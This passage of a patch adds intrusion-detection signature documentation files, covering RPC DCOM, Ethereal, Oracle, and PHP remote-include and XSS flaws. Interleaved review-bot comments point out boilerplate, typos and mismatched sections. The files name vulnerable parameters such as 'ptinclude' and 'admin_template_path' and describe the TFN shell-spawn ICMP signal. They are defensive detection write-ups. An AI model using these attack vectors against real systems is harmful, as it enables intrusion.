+http://www.earlyimpact.com/productcart/support/security-alert-070603.asp
+
+--
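Review bot: "Harded the system" in Corrective Action should be "Harden the system". Attack Scenarios says SQL commands are supplied "via a URI" without naming the script or parameter, and the vendor link is the only pointer; adding the affected script and parameter to Detailed Information would let analysts confirm alerts. The Affected Systems version list is one very long line; one version per line, as Affected Systems entries elsewhere in the patch are laid out, reads better.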
--- /dev/null
+++ b/doc/signatures/3289.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3289
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
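Review bot: the body is identical to 3389.txt above (including the "Expoit" typo in Ease of Attack) and to 3400.txt below; only the Sid differs. Each of the three should say what its own rule matches so the docs are not interchangeable, and Additional References should cite the Microsoft bulletin for the RPC DCOM issue instead of being empty.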
--- /dev/null
+++ b/doc/signatures/3044.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3044
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
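Review bot: Detailed Information says the ACL parsing routine trusts "the size of the ACE given in the packet" and Attack Scenarios refers to "large NT ACLs", but neither names the protocol dissector that parses them, so the reader cannot tell which traffic triggers the rule; state the affected dissector. Additional References is empty; the Ethereal advisory for the fix should be cited next to "Ethereal 0.10.7 and prior".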
--- /dev/null
+++ b/doc/signatures/513.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+513
+
+--
+Summary:
+This event is generated when a Cisco Catalyst switch responds to an external connection that it is listening on the remote management port. 
+
+--
+Impact:
+Denial of service.  A successful connection to the remote management port may allow an attacker access to the switch.
+
+--
+Detailed Information:
+TCP port 7161 is the remote management port for Cisco Catalyst switches.  A vulnerability exists that may allow a user to connect to this port on an affected switch and cause the supervisor module to reload, disabling service while in progress. 
+
+
+--
+Affected Systems:
+Cisco switches:
+
+      The Catalyst 12xx family, running supervisor software versions up to and including 4.29.
+
+      The Catalyst 29xx family (but not the Catalyst 2900XL), running supervisor software versions up to and including 2.1(5), 2.1(501), and 2.1(502). 
+
+      The Catalyst 5xxx series (including the Catalyst 55xx family), running supervisor software versions up to and including 2.1(5), 2.1(501), and 2.1(502).
+
+--
+Attack Scenarios:
+An attacker can exploit a vulnerability associated with the remote management port of Cisco switches, causing a denial of service.
+
+--
+Ease of Attack:
+Unknown.
+
+--
+False Positives:
+This event is generated if any host on the internal network is listening on TCP port 7161 and responds to an external connection request.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable external access to the Cisco switch remote management port.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats
+www.whitehats.com/info/IDS129
+
+CVE 
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0430
+
+--
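Review bot: the Summary sentence "responds to an external connection that it is listening on the remote management port" does not parse; suggest "responds to an external connection request on its remote management port (TCP 7161)", which matches the Detailed Information and False Positives text. The Whitehats reference is written without a scheme ("www.whitehats.com/info/IDS129") while the CVE link has one; make it a full http:// URL like the other files.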
--- /dev/null
+++ b/doc/signatures/3400.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3400
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
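Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match the Detailed Information, which describes a malformed DCOM request to an RPC port; one of the two should be corrected so the reader knows what the rule actually matches. Also "Expoit" in Ease of Attack should be "Exploit", and the empty Additional References section should carry the vendor bulletin for the RPC DCOM overflow.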
--- /dev/null
+++ b/doc/signatures/3206.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3206
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
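Review bot: apart from the Sid, this file is identical to 3400.txt, so nothing tells the reader how rule 3206 differs (which RPC interface, operation or transport it matches); the Summary or Detailed Information should name that. The same "Expoit" typo and the mismatch between Attack Scenarios (overly long filename over a share) and Detailed Information (malformed RPC request) are carried over and should be fixed here as well.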
--- /dev/null
+++ b/doc/signatures/2360.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2360
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application MyphpPagetool.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+MyphpPagetool contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable ptinclude when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root by supplying
+their code in the file pt_config.inc.
+
+--
+Affected Systems:
+	myphpPagetool 0.4.3 -1
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the ptinclude variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
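Review bot: "the privileges of the user running the webserver, usually root" in Detailed Information is misleading, since web servers normally run as an unprivileged dedicated account; suggest "the privileges of the user running the web server". Minor: "GET or POST  request  to" has doubled spaces, the version "myphpPagetool 0.4.3 -1" has a stray space before "-1", and "Rule:  " carries trailing whitespace.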
--- /dev/null
+++ b/doc/signatures/1518.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1518
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+nstelemetry.adp on a web server.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Access to nstelemetry.adp may indicate that a malicious user is trying to
+exploit a well known vulnerability in AOLserver that allows the attacker to read
+password protected files.
+
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	AOLServer.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
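Review bot: the Detailed Information section opens with the specific AOLserver / nstelemetry.adp issue but then appends three generic paragraphs ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion", the credential-checking boilerplate) that say nothing about this rule; drop them or replace them with what the rule matches. "AOLServer." under Affected Systems should be spelled "AOLserver" as in the paragraph above, and since the text calls this a "well known vulnerability", the empty Additional References section should link the advisory.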
--- /dev/null
+++ b/doc/signatures/228.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+228
+
+--
+Summary:
+This event is generated when a Tribe Flood Network (TFN) Distributed Denial of Service (DDoS) client communicates with the TFN handler daemon to spawn a shell.
+
+--
+Impact:
+Attempted DDoS.  If the listed source IP is in your network, it may be a TFN client.  If the listed destination IP is in your network, it may be a TFN handler daemon.
+
+--
+Detailed Information:
+The TFN DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. Clients communicate with daemons to direct them to launch attacks. A client will communicate with a daemon to spawn a shell via an ICMP echo reply with an ICMP identification number of 456 and an ICMP sequence number of 0.  
+
+--
+Affected Systems:
+Any TFN compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a TFN client, it will attempt to communicate with other TFN handler daemons.
+
+--
+Ease of Attack:
+Simple. TFN code is freely available.
+
+--
+False Positives:
+It is possible that this is a legitimate echo reply to a previous echo request that had an ICMP identification value of 456 and an ICMP sequence number of 0.  
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+Arachnids:
+http://www.whitehats.com/info/IDS184
+
+--
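Review bot: the blank line between "Rule:" and the first "--" is missing here, while every other file in the patch has it; add it for consistency. In Detailed Information, "The TFN DDoS uses a tiered structure" reads better as "The TFN DDoS tool uses a tiered structure", and the two sentences in False Positives and Summary both end with trailing whitespace that should be trimmed.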
--- /dev/null
+++ b/doc/signatures/3096.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3096
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
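Review bot: there is a stray blank line between "-- " and "Corrective Action:" (the other sections put the separator directly above the heading), and "Microsoft Windows Server 2000" under Affected Systems is not a product name; it should read "Microsoft Windows 2000 Server". The empty Additional References section should carry the Microsoft security bulletin for the License Logging Service overflow described in Detailed Information.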
--- /dev/null
+++ b/doc/signatures/100000927.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This rule detects certain phishing attempts sent via Microsoft Messenger.
+
+--
+Impact:
+Users who are fooled by the phising attempt may be tricked into downloading 
+malicious code.
+
+--
+Detailed Information:
+The Microsoft Messenger service, which is enabled by default on many Windows 
+systems, allows remote users to send pop-up messages to a given system. While 
+legitimate uses exist, many of these pop-ups contain adware, spyware, and/or 
+phishing attempts. This rule detects a common phishing attempt, which "warns" 
+users that their registry is corrupted and directs them to download software to 
+fix the "problem" at a malicious web site.
+
+--
+Affected Systems:
+Any Windows system with Microsoft Messenger enabled and reachable from the 
+Internet.
+
+--
+Attack Scenarios:
+Attackers will typically use publicly available scripts to send malicious 
+messages.
+
+--
+Ease of Attack:
+Simple; public scripts exist for sending malicious messages.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block Microsoft Messenger at your firewall and/or disable it on individual 
+machines, and educate your users regarding the dangers of following links in 
+such messages.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Sago Networks
+Dan Protich <dprotich@sagonet.com>
+
+--
+Additional References:
+
+--
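Review bot: the Sid field is empty; the filename implies 100000927, so that value should appear under "Sid:" as in the other files. Also "phising" in Impact should be "phishing", and since "Microsoft Messenger" is easily confused with MSN Messenger, the Summary should say "Microsoft Messenger service" as the Detailed Information does.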
--- /dev/null
+++ b/doc/signatures/2767.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2767
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
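Review bot: the sentence in Detailed Information is broken across lines with a lone period starting its own line ("vulnerability in the procedure drop_delete_resolution" / ". This procedure is included in" / "dbms_repcat."), which looks like template substitution residue; join it into "vulnerability in the procedure drop_delete_resolution. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" under Affected Systems duplicates the vendor name, and the package name should be schema-qualified the way 2879.txt does it (sys.dbms_repcat_conf) so the two files are consistent.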
--- /dev/null
+++ b/doc/signatures/100000647.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000647
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
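Review bot: the third Detailed Information paragraph and the Attack Scenarios text ("An attacker can access an authentication mechanism and supply his/her own credentials") are generic CGI-authentication boilerplate that does not describe a remote file include via "admin_template_path"; replace them with the include-path scenario. Minor: "ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", the blank lines after "Sid:", "Affected Systems" and "Contributors" that the other files have are missing, and the file ends with an extra blank "+" line after the final "--".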
--- /dev/null
+++ b/doc/signatures/100000462.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000462
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Open WebMail" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "From" parameter in the "openwebmail-read.pl" 
+script used by the "Open WebMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Open WebMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
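Review bot: the Impact and Detailed Information sections are copied from the remote-file-include template and overstate a reflected cross-site scripting bug: "unauthorized administrative access to the server", "execute system binaries" and "execution of arbitrary code" are server-side outcomes, whereas an XSS in the "From" parameter of openwebmail-read.pl runs script in the victim's browser (the Attack Scenarios line gets this right). Reword Impact to client-side script execution and session or credential theft; the remaining fixes are the missing blank lines after "Sid:" and "Affected Systems" and the trailing blank "+" line at the end of the file.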
--- /dev/null
+++ b/doc/signatures/2879.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2879
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure cancel_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
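Review bot: the Detailed Information sentence is split across lines with the period starting its own line ("procedure cancel_statistics" / ". This procedure is included in" / "sys.dbms_repcat_conf."); join it into one sentence so the period follows the procedure name. "Oracle Oracle9i" under Affected Systems should be "Oracle9i".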
--- /dev/null
+++ b/doc/signatures/3184.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3184
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
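Review bot: this file repeats 3400.txt and 3206.txt verbatim except for the Sid, so the Summary should say which specific RPC DCOM request rule 3184 matches. "Expoit" should be "Exploit", and Attack Scenarios (overly long filename via a network share) still disagrees with Detailed Information (malformed RPC request).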
--- /dev/null
+++ b/doc/signatures/2457.txt
@@ -0,0 +1,48 @@
+Rule:
+
+--
+Sid:
+2457
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger sends or receives a Yahoo Instant Messenger message. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM provides a means of allowing an interactive message exchange between user.  While there are no known exploits associated with exchanging messages, this type of activity may not be appropriate in certain network environments.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attacks.
+
+--
+Ease of Attack:
+No known attacks.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
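Review bot: this file has no "Additional References:" section; every other file in the patch ends with one (even when empty), so add it before the final "--". "interactive message exchange between user" should be "between users", and the False Negatives entry mentions "the default expected ones" without saying which ports the rule watches; naming them would help anyone tuning the rule.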
--- /dev/null
+++ b/doc/signatures/3185.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3185
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
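Review bot: this is the fourth copy of the RPC DCOM text (3400, 3206, 3184 are the others), so the Summary should state what distinguishes rule 3185. "Expoit" should be "Exploit", and Attack Scenarios (overly long filename via a network share) does not match Detailed Information (malformed RPC request).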
--- /dev/null
+++ b/doc/signatures/1120.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1120
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
